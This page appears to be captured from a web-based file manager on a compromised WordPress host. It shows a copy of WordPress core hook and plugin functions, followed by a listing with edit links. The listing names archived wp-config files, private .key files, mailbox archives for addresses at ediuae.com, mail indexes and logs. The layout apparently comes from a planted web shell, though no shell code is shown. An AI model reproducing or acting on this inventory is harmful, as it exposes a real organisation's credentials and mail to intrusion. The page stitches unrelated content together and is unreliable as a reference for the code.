{ $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return $value; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } // Pass the value to WP_Hook. array_unshift( $args, $value ); $filtered = $wp_filter[ $hook_name ]->apply_filters( $value, $args ); array_pop( $wp_current_filter ); return $filtered; } /** * Calls the callback functions that have been added to a filter hook, specifying arguments in an array. * * @since 3.0.0 * * @see apply_filters() This function is identical, but the arguments passed to the * functions hooked to `$hook_name` are supplied using an array. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_filters Stores the number of times each filter was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the filter hook. * @param array $args The arguments supplied to the functions hooked to `$hook_name`. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters_ref_array( $hook_name, $args ) { global $wp_filter, $wp_filters, $wp_current_filter; if ( ! isset( $wp_filters[ $hook_name ] ) ) { $wp_filters[ $hook_name ] = 1; } else { ++$wp_filters[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return $args[0]; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } $filtered = $wp_filter[ $hook_name ]->apply_filters( $args[0], $args ); array_pop( $wp_current_filter ); return $filtered; } /** * Checks if any filter has been registered for a hook. * * When using the `$callback` argument, this function may return a non-boolean value * that evaluates to false (e.g. 0), so use the `===` operator for testing the return value. * * @since 2.5.0 * @since 6.9.0 Added the `$priority` parameter. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The name of the filter hook. * @param callable|string|array|false $callback Optional. The callback to check for. * This function can be called unconditionally to speculatively check * a callback that may or may not exist. Default false. * @param int|false $priority Optional. The specific priority at which to check for the callback. * Default false. * @return bool|int If `$callback` is omitted, returns boolean for whether the hook has * anything registered. When checking a specific function, the priority * of that hook is returned, or false if the function is not attached. * If `$callback` and `$priority` are both provided, a boolean is returned * for whether the specific function is registered at that priority. */ function has_filter( $hook_name, $callback = false, $priority = false ) { global $wp_filter; if ( ! isset( $wp_filter[ $hook_name ] ) ) { return false; } return $wp_filter[ $hook_name ]->has_filter( $hook_name, $callback, $priority ); } /** * Removes a callback function from a filter hook. * * This can be used to remove default functions attached to a specific filter * hook and possibly replace them with a substitute. * * To remove a hook, the `$callback` and `$priority` arguments must match * when the hook was added. This goes for both filters and actions. No warning * will be given on removal failure. * * @since 1.2.0 * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The filter hook to which the function to be removed is hooked. * @param callable|string|array $callback The callback to be removed from running when the filter is applied. * This function can be called unconditionally to speculatively remove * a callback that may or may not exist. * @param int $priority Optional. The exact priority used when adding the original * filter callback. Default 10. * @return bool Whether the function existed before it was removed. */ function remove_filter( $hook_name, $callback, $priority = 10 ) { global $wp_filter; $r = false; if ( isset( $wp_filter[ $hook_name ] ) ) { $r = $wp_filter[ $hook_name ]->remove_filter( $hook_name, $callback, $priority ); if ( ! $wp_filter[ $hook_name ]->callbacks ) { unset( $wp_filter[ $hook_name ] ); } } return $r; } /** * Removes all of the callback functions from a filter hook. * * @since 2.7.0 * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param string $hook_name The filter to remove callbacks from. * @param int|false $priority Optional. The priority number to remove them from. * Default false. * @return true Always returns true. */ function remove_all_filters( $hook_name, $priority = false ) { global $wp_filter; if ( isset( $wp_filter[ $hook_name ] ) ) { $wp_filter[ $hook_name ]->remove_all_filters( $priority ); if ( ! $wp_filter[ $hook_name ]->has_filters() ) { unset( $wp_filter[ $hook_name ] ); } } return true; } /** * Retrieves the name of the current filter hook. * * @since 2.5.0 * * @global string[] $wp_current_filter Stores the list of current filters with the current one last * * @return string|false Hook name of the current filter, false if no filter is running. */ function current_filter() { global $wp_current_filter; return end( $wp_current_filter ); } /** * Returns whether or not a filter hook is currently being processed. * * The function current_filter() only returns the most recent filter being executed. * did_filter() returns the number of times a filter has been applied during * the current request. * * This function allows detection for any filter currently being executed * (regardless of whether it's the most recent filter to fire, in the case of * hooks called from hook callbacks) to be verified. * * @since 3.9.0 * * @see current_filter() * @see did_filter() * @global string[] $wp_current_filter Current filter. * * @param string|null $hook_name Optional. Filter hook to check. Defaults to null, * which checks if any filter is currently being run. * @return bool Whether the filter is currently in the stack. */ function doing_filter( $hook_name = null ) { global $wp_current_filter; if ( null === $hook_name ) { return ! empty( $wp_current_filter ); } return in_array( $hook_name, $wp_current_filter, true ); } /** * Retrieves the number of times a filter has been applied during the current request. * * @since 6.1.0 * * @global int[] $wp_filters Stores the number of times each filter was triggered. * * @param string $hook_name The name of the filter hook. * @return int The number of times the filter hook has been applied. */ function did_filter( $hook_name ) { global $wp_filters; if ( ! isset( $wp_filters[ $hook_name ] ) ) { return 0; } return $wp_filters[ $hook_name ]; } /** * Adds a callback function to an action hook. * * Actions are the hooks that the WordPress core launches at specific points * during execution, or when specific events occur. Plugins can specify that * one or more of its PHP functions are executed at these points, using the * Action API. * * @since 1.2.0 * * @param string $hook_name The name of the action to add the callback to. * @param callable $callback The callback to be run when the action is called. * @param int $priority Optional. Used to specify the order in which the functions * associated with a particular action are executed. * Lower numbers correspond with earlier execution, * and functions with the same priority are executed * in the order in which they were added to the action. Default 10. * @param int $accepted_args Optional. The number of arguments the function accepts. Default 1. * @return true Always returns true. */ function add_action( $hook_name, $callback, $priority = 10, $accepted_args = 1 ) { return add_filter( $hook_name, $callback, $priority, $accepted_args ); } /** * Calls the callback functions that have been added to an action hook. * * This function invokes all functions attached to action hook `$hook_name`. * It is possible to create new action hooks by simply calling this function, * specifying the name of the new hook using the `$hook_name` parameter. * * You can pass extra arguments to the hooks, much like you can with `apply_filters()`. * * Example usage: * * // The action callback function. * function example_callback( $arg1, $arg2 ) { * // (maybe) do something with the args. * } * add_action( 'example_action', 'example_callback', 10, 2 ); * * /* * * Trigger the actions by calling the 'example_callback()' function * * that's hooked onto `example_action` above. * * * * - 'example_action' is the action hook. * * - $arg1 and $arg2 are the additional arguments passed to the callback. * do_action( 'example_action', $arg1, $arg2 ); * * @since 1.2.0 * @since 5.3.0 Formalized the existing and already documented `...$arg` parameter * by adding it to the function signature. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_actions Stores the number of times each action was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the action to be executed. * @param mixed ...$arg Optional. Additional arguments which are passed on to the * functions hooked to the action. Default empty. */ function do_action( $hook_name, ...$arg ) { global $wp_filter, $wp_actions, $wp_current_filter; if ( ! isset( $wp_actions[ $hook_name ] ) ) { $wp_actions[ $hook_name ] = 1; } else { ++$wp_actions[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } if ( empty( $arg ) ) { $arg[] = ''; } elseif ( is_array( $arg[0] ) && 1 === count( $arg[0] ) && isset( $arg[0][0] ) && is_object( $arg[0][0] ) ) { // Backward compatibility for PHP4-style passing of `array( &$this )` as action `$arg`. $arg[0] = $arg[0][0]; } $wp_filter[ $hook_name ]->do_action( $arg ); array_pop( $wp_current_filter ); } /** * Calls the callback functions that have been added to an action hook, specifying arguments in an array. * * @since 2.1.0 * * @see do_action() This function is identical, but the arguments passed to the * functions hooked to `$hook_name` are supplied using an array. * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * @global int[] $wp_actions Stores the number of times each action was triggered. * @global string[] $wp_current_filter Stores the list of current filters with the current one last. * * @param string $hook_name The name of the action to be executed. * @param array $args The arguments supplied to the functions hooked to `$hook_name`. */ function do_action_ref_array( $hook_name, $args ) { global $wp_filter, $wp_actions, $wp_current_filter; if ( ! isset( $wp_actions[ $hook_name ] ) ) { $wp_actions[ $hook_name ] = 1; } else { ++$wp_actions[ $hook_name ]; } // Do 'all' actions first. if ( isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; $all_args = func_get_args(); // phpcs:ignore PHPCompatibility.FunctionUse.ArgumentFunctionsReportCurrentValue.NeedsInspection _wp_call_all_hook( $all_args ); } if ( ! isset( $wp_filter[ $hook_name ] ) ) { if ( isset( $wp_filter['all'] ) ) { array_pop( $wp_current_filter ); } return; } if ( ! isset( $wp_filter['all'] ) ) { $wp_current_filter[] = $hook_name; } $wp_filter[ $hook_name ]->do_action( $args ); array_pop( $wp_current_filter ); } /** * Checks if any action has been registered for a hook. * * When using the `$callback` argument, this function may return a non-boolean value * that evaluates to false (e.g. 0), so use the `===` operator for testing the return value. * * @since 2.5.0 * @since 6.9.0 Added the `$priority` parameter. * * @see has_filter() This function is an alias of has_filter(). * * @param string $hook_name The name of the action hook. * @param callable|string|array|false $callback Optional. The callback to check for. * This function can be called unconditionally to speculatively check * a callback that may or may not exist. Default false. * @param int|false $priority Optional. The specific priority at which to check for the callback. * Default false. * @return bool|int If `$callback` is omitted, returns boolean for whether the hook has * anything registered. When checking a specific function, the priority * of that hook is returned, or false if the function is not attached. * If `$callback` and `$priority` are both provided, a boolean is returned * for whether the specific function is registered at that priority. */ function has_action( $hook_name, $callback = false, $priority = false ) { return has_filter( $hook_name, $callback, $priority ); } /** * Removes a callback function from an action hook. * * This can be used to remove default functions attached to a specific action * hook and possibly replace them with a substitute. * * To remove a hook, the `$callback` and `$priority` arguments must match * when the hook was added. This goes for both filters and actions. No warning * will be given on removal failure. * * @since 1.2.0 * * @param string $hook_name The action hook to which the function to be removed is hooked. * @param callable|string|array $callback The name of the function which should be removed. * This function can be called unconditionally to speculatively remove * a callback that may or may not exist. * @param int $priority Optional. The exact priority used when adding the original * action callback. Default 10. * @return bool Whether the function is removed. */ function remove_action( $hook_name, $callback, $priority = 10 ) { return remove_filter( $hook_name, $callback, $priority ); } /** * Removes all of the callback functions from an action hook. * * @since 2.7.0 * * @param string $hook_name The action to remove callbacks from. * @param int|false $priority Optional. The priority number to remove them from. * Default false. * @return true Always returns true. */ function remove_all_actions( $hook_name, $priority = false ) { return remove_all_filters( $hook_name, $priority ); } /** * Retrieves the name of the current action hook. * * @since 3.9.0 * * @return string|false Hook name of the current action, false if no action is running. */ function current_action() { return current_filter(); } /** * Returns whether or not an action hook is currently being processed. * * The function current_action() only returns the most recent action being executed. * did_action() returns the number of times an action has been fired during * the current request. * * This function allows detection for any action currently being executed * (regardless of whether it's the most recent action to fire, in the case of * hooks called from hook callbacks) to be verified. * * @since 3.9.0 * * @see current_action() * @see did_action() * * @param string|null $hook_name Optional. Action hook to check. Defaults to null, * which checks if any action is currently being run. * @return bool Whether the action is currently in the stack. */ function doing_action( $hook_name = null ) { return doing_filter( $hook_name ); } /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $wp_actions Stores the number of times each action was triggered. * * @param string $hook_name The name of the action hook. * @return int The number of times the action hook has been fired. */ function did_action( $hook_name ) { global $wp_actions; if ( ! isset( $wp_actions[ $hook_name ] ) ) { return 0; } return $wp_actions[ $hook_name ]; } /** * Fires functions attached to a deprecated filter hook. * * When a filter hook is deprecated, the apply_filters() call is replaced with * apply_filters_deprecated(), which triggers a deprecation notice and then fires * the original filter hook. * * Note: the value and extra arguments passed to the original apply_filters() call * must be passed here to `$args` as an array. For example: * * // Old filter. * return apply_filters( 'wpdocs_filter', $value, $extra_arg ); * * // Deprecated. * return apply_filters_deprecated( 'wpdocs_filter', array( $value, $extra_arg ), '4.9.0', 'wpdocs_new_filter' ); * * @since 4.6.0 * * @see _deprecated_hook() * * @param string $hook_name The name of the filter hook. * @param array $args Array of additional function arguments to be passed to apply_filters(). * @param string $version The version of WordPress that deprecated the hook. * @param string $replacement Optional. The hook that should have been used. Default empty. * @param string $message Optional. A message regarding the change. Default empty. * @return mixed The filtered value after all hooked functions are applied to it. */ function apply_filters_deprecated( $hook_name, $args, $version, $replacement = '', $message = '' ) { if ( ! has_filter( $hook_name ) ) { return $args[0]; } _deprecated_hook( $hook_name, $version, $replacement, $message ); return apply_filters_ref_array( $hook_name, $args ); } /** * Fires functions attached to a deprecated action hook. * * When an action hook is deprecated, the do_action() call is replaced with * do_action_deprecated(), which triggers a deprecation notice and then fires * the original hook. * * @since 4.6.0 * * @see _deprecated_hook() * * @param string $hook_name The name of the action hook. * @param array $args Array of additional function arguments to be passed to do_action(). * @param string $version The version of WordPress that deprecated the hook. * @param string $replacement Optional. The hook that should have been used. Default empty. * @param string $message Optional. A message regarding the change. Default empty. */ function do_action_deprecated( $hook_name, $args, $version, $replacement = '', $message = '' ) { if ( ! has_action( $hook_name ) ) { return; } _deprecated_hook( $hook_name, $version, $replacement, $message ); do_action_ref_array( $hook_name, $args ); } // // Functions for handling plugins. // /** * Gets the basename of a plugin. * * This method extracts the name of a plugin from its filename. * * @since 1.5.0 * * @global array $wp_plugin_paths * * @param string $file The filename of plugin. * @return string The name of a plugin. */ function plugin_basename( $file ) { global $wp_plugin_paths; // $wp_plugin_paths contains normalized paths. $file = wp_normalize_path( $file ); arsort( $wp_plugin_paths ); foreach ( $wp_plugin_paths as $dir => $realdir ) { if ( str_starts_with( $file, $realdir ) ) { $file = $dir . substr( $file, strlen( $realdir ) ); } } $plugin_dir = wp_normalize_path( WP_PLUGIN_DIR ); $mu_plugin_dir = wp_normalize_path( WPMU_PLUGIN_DIR ); // Get relative path from plugins directory. $file = preg_replace( '#^' . preg_quote( $plugin_dir, '#' ) . '/|^' . preg_quote( $mu_plugin_dir, '#' ) . '/#', '', $file ); $file = trim( $file, '/' ); return $file; } /** * Register a plugin's real path. * * This is used in plugin_basename() to resolve symlinked paths. * * @since 3.9.0 * * @see wp_normalize_path() * * @global array $wp_plugin_paths * * @param string $file Known path to the file. * @return bool Whether the path was able to be registered. */ function wp_register_plugin_realpath( $file ) { global $wp_plugin_paths; // Normalize, but store as static to avoid recalculation of a constant value. static $wp_plugin_path = null, $wpmu_plugin_path = null; if ( ! isset( $wp_plugin_path ) ) { $wp_plugin_path = wp_normalize_path( WP_PLUGIN_DIR ); $wpmu_plugin_path = wp_normalize_path( WPMU_PLUGIN_DIR ); } $plugin_path = wp_normalize_path( dirname( $file ) ); $plugin_realpath = wp_normalize_path( dirname( realpath( $file ) ) ); if ( $plugin_path === $wp_plugin_path || $plugin_path === $wpmu_plugin_path ) { return false; } if ( $plugin_path !== $plugin_realpath ) { $wp_plugin_paths[ $plugin_path ] = $plugin_realpath; } return true; } /** * Get the filesystem directory path (with trailing slash) for the plugin __FILE__ passed in. * * @since 2.8.0 * * @param string $file The filename of the plugin (__FILE__). * @return string the filesystem path of the directory that contains the plugin. */ function plugin_dir_path( $file ) { return trailingslashit( dirname( $file ) ); } /** * Get the URL directory path (with trailing slash) for the plugin __FILE__ passed in. * * @since 2.8.0 * * @param string $file The filename of the plugin (__FILE__). * @return string the URL path of the directory that contains the plugin. */ function plugin_dir_url( $file ) { return trailingslashit( plugins_url( '', $file ) ); } /** * Set the activation hook for a plugin. * * When a plugin is activated, the action 'activate_PLUGINNAME' hook is * called. In the name of this hook, PLUGINNAME is replaced with the name * of the plugin, including the optional subdirectory. For example, when the * plugin is located in wp-content/plugins/sampleplugin/sample.php, then * the name of this hook will become 'activate_sampleplugin/sample.php'. * * When the plugin consists of only one file and is (as by default) located at * wp-content/plugins/sample.php the name of this hook will be * 'activate_sample.php'. * * @since 2.0.0 * * @param string $file The filename of the plugin including the path. * @param callable $callback The function hooked to the 'activate_PLUGIN' action. */ function register_activation_hook( $file, $callback ) { $file = plugin_basename( $file ); add_action( 'activate_' . $file, $callback ); } /** * Sets the deactivation hook for a plugin. * * When a plugin is deactivated, the action 'deactivate_PLUGINNAME' hook is * called. In the name of this hook, PLUGINNAME is replaced with the name * of the plugin, including the optional subdirectory. For example, when the * plugin is located in wp-content/plugins/sampleplugin/sample.php, then * the name of this hook will become 'deactivate_sampleplugin/sample.php'. * * When the plugin consists of only one file and is (as by default) located at * wp-content/plugins/sample.php the name of this hook will be * 'deactivate_sample.php'. * * @since 2.0.0 * * @param string $file The filename of the plugin including the path. * @param callable $callback The function hooked to the 'deactivate_PLUGIN' action. */ function register_deactivation_hook( $file, $callback ) { $file = plugin_basename( $file ); add_action( 'deactivate_' . $file, $callback ); } /** * Sets the uninstallation hook for a plugin. * * Registers the uninstall hook that will be called when the user clicks on the * uninstall link that calls for the plugin to uninstall itself. The link won't * be active unless the plugin hooks into the action. * * The plugin should not run arbitrary code outside of functions, when * registering the uninstall hook. In order to run using the hook, the plugin * will have to be included, which means that any code laying outside of a * function will be run during the uninstallation process. The plugin should not * hinder the uninstallation process. * * If the plugin can not be written without running code within the plugin, then * the plugin should create a file named 'uninstall.php' in the base plugin * folder. This file will be called, if it exists, during the uninstallation process * bypassing the uninstall hook. The plugin, when using the 'uninstall.php' * should always check for the 'WP_UNINSTALL_PLUGIN' constant, before * executing. * * @since 2.7.0 * * @param string $file Plugin file. * @param callable $callback The callback to run when the hook is called. Must be * a static method or function. */ function register_uninstall_hook( $file, $callback ) { if ( is_array( $callback ) && is_object( $callback[0] ) ) { _doing_it_wrong( __FUNCTION__, __( 'Only a static class method or function can be used in an uninstall hook.' ), '3.1.0' ); return; } /* * The option should not be autoloaded, because it is not needed in most * cases. Emphasis should be put on using the 'uninstall.php' way of * uninstalling the plugin. */ $uninstallable_plugins = (array) get_option( 'uninstall_plugins' ); $plugin_basename = plugin_basename( $file ); if ( ! isset( $uninstallable_plugins[ $plugin_basename ] ) || $uninstallable_plugins[ $plugin_basename ] !== $callback ) { $uninstallable_plugins[ $plugin_basename ] = $callback; update_option( 'uninstall_plugins', $uninstallable_plugins ); } } /** * Calls the 'all' hook, which will process the functions hooked into it. * * The 'all' hook passes all of the arguments or parameters that were used for * the hook, which this function was called for. * * This function is used internally for apply_filters(), do_action(), and * do_action_ref_array() and is not meant to be used from outside those * functions. This function does not check for the existence of the all hook, so * it will fail unless the all hook exists prior to this function call. * * @since 2.5.0 * @access private * * @global WP_Hook[] $wp_filter Stores all of the filters and actions. * * @param array $args The collected parameters from the hook that was called. */ function _wp_call_all_hook( $args ) { global $wp_filter; $wp_filter['all']->do_all_hook( $args ); } /** * Builds a unique string ID for a hook callback function. * * Functions and static method callbacks are just returned as strings and * shouldn't have any speed penalty. * * @link https://core.trac.wordpress.org/ticket/3875 * * @since 2.2.3 * @since 5.3.0 Removed workarounds for spl_object_hash(). * `$hook_name` and `$priority` are no longer used, * and the function always returns a string. * * @access private * * @param string $hook_name Unused. The name of the filter to build ID for. * @param callable|string|array $callback The callback to generate ID for. The callback may * or may not exist. * @param int $priority Unused. The order in which the functions * associated with a particular action are executed. * @return string|null Unique function ID for usage as array key. * Null if a valid `$callback` is not passed. */ function _wp_filter_build_unique_id( $hook_name, $callback, $priority ) { if ( is_string( $callback ) ) { return $callback; } if ( is_object( $callback ) ) { // Closures are currently implemented as objects. $callback = array( $callback, '' ); } else { $callback = (array) $callback; } if ( is_object( $callback[0] ) ) { // Object class calling. return spl_object_hash( $callback[0] ) . $callback[1]; } elseif ( is_string( $callback[0] ) ) { // Static calling. return $callback[0] . '::' . $callback[1]; } return null; }
[+]
..
[-] l10n.tar.gz
[edit]
[-] quicktags.js.tar
[edit]
[-] embed.php.tar
[edit]
[-] b.zip
[edit]
[-] class-phpmailer.php.tar
[edit]
[-] masonry.min.js.tar
[edit]
[-] class-phpass.php.tar
[edit]
[-] .gayan@ediuae_com.zip
[edit]
[-] social@ediuae.com.tar.gz
[edit]
[-] twig.zip
[edit]
[-] 599792.tar.gz
[edit]
[-] media-views-rtl.css.tar
[edit]
[-] xb89c12.tar.gz
[edit]
[-] compat.php.php.tar.gz
[edit]
[-] SimplePie.tar.gz
[edit]
[-] class-IXR-request.php.php.tar.gz
[edit]
[-] wp-lists.min.js.tar
[edit]
[-] tmp.tar
[edit]
[-] dovecot-uidvalidity.69a2ba17.tar
[edit]
[-] wp-custom-header.min.js.tar
[edit]
[-] rss.php.php.tar.gz
[edit]
[-] shortcode.min.js.min.js.tar.gz
[edit]
[-] nav-menu.min.js.tar
[edit]
[-] debug.tar.gz
[edit]
[-] icons32-vs.png.tar
[edit]
[-] wp-embed.min.js.tar
[edit]
[-] agrivaingredients.com.zip
[edit]
[-] nvdata.tar
[edit]
[-] style-engine.php.tar
[edit]
[-] Parse.tar
[edit]
[-] custom-background.php.php.tar.gz
[edit]
[-] Jcrop.gif.tar
[edit]
[-] wp-pointer.min.css.min.css.tar.gz
[edit]
[-] ediuae.com.tar
[edit]
[-] src.tar.gz
[edit]
[-] 4.tar
[edit]
[-] vcards.zip
[edit]
[-] vertice.tar
[edit]
[-] theme-i18n.json.json.tar.gz
[edit]
[-] dovecot-uidlist.tar
[edit]
[-] class-wp-network.php.tar
[edit]
[-] style-engine.tar.gz
[edit]
[-] errors.log.tar
[edit]
[-] wp-config.php.php.tar.gz
[edit]
[-] wp-embed.js.tar
[edit]
[-] ms-settings.php.php.tar.gz
[edit]
[-] class-avif-info.php.tar
[edit]
[-] eliteroyalcrown.com.tar
[edit]
[-] user.php.tar
[edit]
[-] car.txt.txt.tar.gz
[edit]
[-] edit-form-blocks.php.tar
[edit]
[-] b4d7b_d3a69_87b7190954ee6c370270407b46101613.key.tar
[edit]
[-] server.c302.cloudmark.com.conf.tar
[edit]
[-] contribute.php.php.tar.gz
[edit]
[-] block-patterns.tar
[edit]
[-] generic.png.tar
[edit]
[-] gallery.tar
[edit]
[-] user_prefs.tar
[edit]
[-] toggige-arrow.jpg.tar
[edit]
[-] class-wp-embed.php.tar
[edit]
[-] f.tar.gz
[edit]
[-] class-wp-matchesmapregex.php.php.tar.gz
[edit]
[-] browser.png.png.tar.gz
[edit]
[-] site-logo.zip
[edit]
[-] .bashrc.bashrc.tar.gz
[edit]
[-] ms-deprecated.php.tar
[edit]
[-] wp-blog-header.php.tar
[edit]
[-] admin-bar-rtl.min.css.min.css.tar.gz
[edit]
[-] deprecated.php.php.tar.gz
[edit]
[-] wp-blog-header.php.php.tar.gz
[edit]
[-] gimanthi@ediuae.com.zip
[edit]
[-] wp-trackback.php.php.tar.gz
[edit]
[-] class-wp-image-editor.php.tar
[edit]
[-] hr@ediuae.com.tar
[edit]
[-] class-wp-comment-query.php.tar
[edit]
[-] comments.zip
[edit]
[-] rss-functions.php.php.tar.gz
[edit]
[-] post-formats.png.tar
[edit]
[-] contribute.php.tar
[edit]
[-] customize-models.min.js.tar
[edit]
[-] vcards.tar.gz
[edit]
[-] feed-rss.php.php.tar.gz
[edit]
[-] nakaafi.com.tar
[edit]
[-] wp-embed-template.css.css.tar.gz
[edit]
[-] php-compat.zip
[edit]
[-] class-wp-theme.php.tar
[edit]
[-] pki-validation.tar
[edit]
[-] .bash_logout.tar
[edit]
[-] admin-header.php.php.tar.gz
[edit]
[-] load-styles.php.php.tar.gz
[edit]
[-] word-count.js.tar
[edit]
[-] media-upload.php.tar
[edit]
[-] registration.php.tar
[edit]
[-] search.tar
[edit]
[-] page-list.tar.gz
[edit]
[-] options-privacy.php.tar
[edit]
[-] zxcvbn-async.js.tar
[edit]
[-] class-IXR-request.php.tar
[edit]
[-] https-detection.php.php.tar.gz
[edit]
[-] vars.php.php.tar.gz
[edit]
[-] ms-themes-reference.php.php.tar.gz
[edit]
[-] class-pop3.php.tar
[edit]
[-] update.php.php.tar.gz
[edit]
[-] class-wp-role.php.tar
[edit]
[-] 9.tar.gz
[edit]
[-] http.php.tar
[edit]
[-] class.wp-styles.php.wp-styles.php.tar.gz
[edit]
[-] imf865ac.tar.gz
[edit]
[-] wp-diff.php.tar
[edit]
[-] yes.png.tar
[edit]
[-] subscriptions.tar
[edit]
[-] rss.php.tar
[edit]
[-] css.zip
[edit]
[-] users.php.tar
[edit]
[-] includes.tar
[edit]
[-] class-IXR.php.tar
[edit]
[-] post-content.tar.gz
[edit]
[-] functions.php.tar
[edit]
[-] AVAILABLE_APPLICATIONS_CACHE_en_jupiter.tar
[edit]
[-] pramod.zip
[edit]
[-] plugin-install.js.tar
[edit]
[-] postbox.min.js.min.js.tar.gz
[edit]
[-] f.tar
[edit]
[-] social-links.tar.gz
[edit]
[-] langs.zip
[edit]
[-] class-wp-http-cookie.php.php.tar.gz
[edit]
[-] litespeed.zip
[edit]
[-] class-wp-site.php.php.tar.gz
[edit]
[-] zxcvbn-async.js.js.tar.gz
[edit]
[-] backbone.min.js.tar
[edit]
[-] wpicons.png.tar
[edit]
[-] wp-signup.php.tar
[edit]
[-] dashicons.woff.woff.tar.gz
[edit]
[-] wpdialog.min.js.min.js.tar.gz
[edit]
[-] codemirror.tar
[edit]
[-] ms-users.php.php.tar.gz
[edit]
[-] style.css.css.tar.gz
[edit]
[-] tags-box.min.js.tar
[edit]
[-] .imunify_patch_id.imunify_patch_id.tar.gz
[edit]
[-] ccc0f_00e9b_cbd031f35ea9e54ecfe1e562cde28098.key.key.tar.gz
[edit]
[-] revisions.min.js.min.js.tar.gz
[edit]
[-] class-wp-block-parser-block.php.tar
[edit]
[-] media-new.php.php.tar.gz
[edit]
[-] block-editor.php.php.tar.gz
[edit]
[-] plugins.tar.gz
[edit]
[-] options-discussion.php.php.tar.gz
[edit]
[-] class-wp-network-query.php.tar
[edit]
[-] class-wp-query.php.tar
[edit]
[-] import.php.php.tar.gz
[edit]
[-] widgets-form.php.php.tar.gz
[edit]
[-] utf8.php.php.tar.gz
[edit]
[-] feed-rss2.php.php.tar.gz
[edit]
[-] block-i18n.json.tar
[edit]
[-] query.php.tar
[edit]
[-] zxcvbn.min.js.tar
[edit]
[-] .myimunify_id.tar
[edit]
[-] AVAILABLE_APPLICATIONS_CACHE_en_jupiter.tar.gz
[edit]
[-] .softaculous.zip
[edit]
[-] class-oembed.php.tar
[edit]
[-] elementor.zip
[edit]
[-] dovecot.list.index.tar
[edit]
[-] 2.tar.gz
[edit]
[-] ssl.zip
[edit]
[-] class-wp-network-query.php.php.tar.gz
[edit]
[-] ms-delete-site.php.php.tar.gz
[edit]
[-] Diff.tar.gz
[edit]
[-] session.php.tar
[edit]
[-] utils.min.js.tar
[edit]
[-] .hamna@ediuae_com.tar.gz
[edit]
[-] shortcodes.php.tar
[edit]
[-] archives.php.php.tar.gz
[edit]
[-] ms-themes.php.php.tar.gz
[edit]
[-] roundcube.tar.gz
[edit]
[-] .Archive.zip
[edit]
[-] buttons.css.css.tar.gz
[edit]
[-] 486.tar.gz
[edit]
[-] ssl.db.db.tar.gz
[edit]
[-] db.php.php.tar.gz
[edit]
[-] d.zip
[edit]
[-] import.php.tar
[edit]
[-] sort-2x.gif.gif.tar.gz
[edit]
[-] plugin-editor.php.php.tar.gz
[edit]
[-] admin@ediuae.com.tar.gz
[edit]
[-] accordion.tar.gz
[edit]
[-] list-2x.png.tar
[edit]
[-] elementor.tar.gz
[edit]
[-] hr@ediuae.com.zip
[edit]
[-] akismet.tar.gz
[edit]
[-] screenshots.zip
[edit]
[-] pattern.php.php.tar.gz
[edit]
[-] wp-cron.php.php.tar.gz
[edit]
[-] class-wp-oembed.php.php.tar.gz
[edit]
[-] mediaelement.tar.gz
[edit]
[-] 6.tar
[edit]
[-] site-editor.php.php.tar.gz
[edit]
[-] kses.php.php.tar.gz
[edit]
[-] swfobject.min.js.min.js.tar.gz
[edit]
[-] customize-preview.min.js.min.js.tar.gz
[edit]
[-] var.tar.gz
[edit]
[-] canonical.php.tar
[edit]
[-] class-wp-http-curl.php.tar
[edit]
[-] error-protection.php.tar
[edit]
[-] logs.zip
[edit]
[-] customize-preview.min.js.tar
[edit]
[-] block-bindings.tar.gz
[edit]
[-] theme-editor.php.tar
[edit]
[-] mail.tar
[edit]
[-] wpspin-1x.gif.tar
[edit]
[-] comment-date.tar.gz
[edit]
[-] class-oembed.php.php.tar.gz
[edit]
[-] .spamassassin.tar.gz
[edit]
[-] code.tar
[edit]
[-] archives.php.tar
[edit]
[-] class-wp-editor.php.tar
[edit]
[-] table.tar
[edit]
[-] providers.zip
[edit]
[-] w-logo-blue.png.png.tar.gz
[edit]
[-] wp-compat.tar.gz
[edit]
[-] king-addons.zip
[edit]
[-] pro-elements.zip
[edit]
[-] class-wp-hook.php.tar
[edit]
[-] wp-compat.tar
[edit]
[-] cur.tar
[edit]
[-] class-phpass.php.php.tar.gz
[edit]
[-] admin-footer.php.php.tar.gz
[edit]
[-] script-loader.php.php.tar.gz
[edit]
[-] zxcvbn.min.js.min.js.tar.gz
[edit]
[-] 4943b4.tar.gz
[edit]
[-] vars.php.tar
[edit]
[-] calendar.php.php.tar.gz
[edit]
[-] admin-functions.php.tar
[edit]
[-] class-wp-http-cookie.php.tar
[edit]
[-] list.zip
[edit]
[-] dovecot-acl-list.tar.gz
[edit]
[-] b1385_2d651_9cf5cb04810ff15d72dbd32c3da7776e.key.key.tar.gz
[edit]
[-] meta.php.tar
[edit]
